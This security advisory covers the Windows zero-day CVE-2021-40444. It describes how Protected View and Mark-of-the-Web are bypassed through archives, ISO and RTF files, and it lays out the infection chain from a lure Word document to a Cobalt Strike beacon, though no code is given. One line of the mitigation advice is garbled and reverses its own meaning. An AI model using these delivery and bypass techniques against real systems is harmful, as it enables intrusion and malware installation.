UPDATE: MITIGATIONS BYPASSED
--
Summary:
Windows Zero-day CVE-2021-40444 is being actively exploited in attacks. The vulnerability was disclosed on Tuesday with little details and is still awaiting an official patch. The vulnerability uses malicious ActiveX controls to exploit various Windows programs including Microsoft Office 365 and Office 2019, and can be used to install malware on an impacted computer.
Several malicious Word documents used in attacks have been discovered by Security researchers, shedding some light on the vulnerability. Although mitigations have been released by Microsoft, it appears these can be bypassed.
Analyst Comments:
For the most part, Microsoft Office’s “Protected View” feature will block the exploit, but if a user clicks “Enable Editing” the attack can continue.
Microsoft Office will check if a document is marked with a “Mark of the Web” (MoTW) meaning it originated from the Internet. If that tag exists, the document will open in read-only mode until a user clicks on “Enable Editing.”
There are some issues with these defenses, first of all, users may be lured into enabling editing which will allow the malicious document to run. Second, Threat actors have clever ways of making a document not have the MOTW tag, which will negate this protection.
"If the document is in a container that is processed by something that is not MotW-aware, then the fact that the container was downloaded from the Internet will be moot. For example, if 7Zip opens an archive that came from the Internet, the extracted contents will have no indication that it came from the Internet. So no MotW, no Protected View. Similarly, if the document is in a container like an ISO file, a Windows user can simply double-click on the ISO to open it. But Windows doesn't treat the contents as having come from the Internet. So again, no MotW, no Protected View. This attack is more dangerous than macros because any organization that has chosen to disable or otherwise limit Macro execution will still be open to arbitrary code execution simply as the result of opening an Office document" (
Bleeping Computer, 2021).
The vulnerability can also be used in RTF files which do not benefit from the Protected View security feature.
Earlier this week Microsoft released mitigations to prevent ActiveX controls from running in Internet Explorer, which would block attacks, but security researchers have found ways to bypass these mitigations. Now that the mitigations have been bypassed, CVE-2021-40444 has become more severe than originally thought. There is hope that Microsoft will be able to release a patch by next Tuesday during their Monthly Patch Tuesday updates. In the meantime users will need to avoid phishing and social engineering attacks that exploit this vulnerability.
Mitigation:
No patch exists for this vulnerability and mitigations have been bypassed. Until a patch or further mitigations are released, users will need to avoid falling for phishing attacks related to CVE-2021-40444.
“One of the known malicious Word attachments used in the attacks is named “A Letter before court 4.docx” and claims to be a letter from an attorney. Since the file was downloaded from the Internet, it will be tagged with the 'Mark of the Web' and opened in Protected View” (
Bleeping Computer, 2021).
“Once a user clicks on the 'Enable Editing' button, the exploit will open an URL using the 'mhtml' protocol to a “side.html” file hosted at a remote site, which is loaded as a Word template. As 'mhtml' URLs are registered to Internet Explorer, the browser will start to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability by creating a malicious ActiveX control. This ActiveX control will download a ministry.cab file from a remote site, extract a championship.inf file (actually a DLL), and execute it as a Control Panel 'CPL' file” (
Bleeping Computer, 2021).
TrendMicro states that the ultimate payload is installing a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device. Once the attacker gains remote access to victims' computers, they can use it to spread laterally throughout the network and install further malware, steal files, or deploy ransomware.
Due to the severity of this vulnerability, it is strongly advised that users only open attachments unless they come from a trusted source.
Source:
https://www.bleepingcomputer.com/ne...ro-day-defenses-bypassed-as-new-info-emerges/